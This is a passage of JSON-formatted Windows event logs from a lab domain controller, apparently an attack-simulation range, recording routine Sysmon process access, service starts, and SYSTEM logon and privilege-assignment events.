{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.831\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.831","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76807,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The Netlogon service entered the running state.","param1":"Netlogon","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220272,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220273,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76808,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The Spooler service entered the running state.","param1":"Spooler","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220274,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220275,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220276,"ProcessID":864,"ThreadID":916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220277,"ProcessID":864,"ThreadID":916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220278,"ProcessID":864,"ThreadID":916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220279,"ProcessID":864,"ThreadID":916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76809,"ProcessID":856,"ThreadID":956,"Channel":"System","Message":"The RemoteRegistry service entered the running state.","param1":"RemoteRegistry","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220280,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication 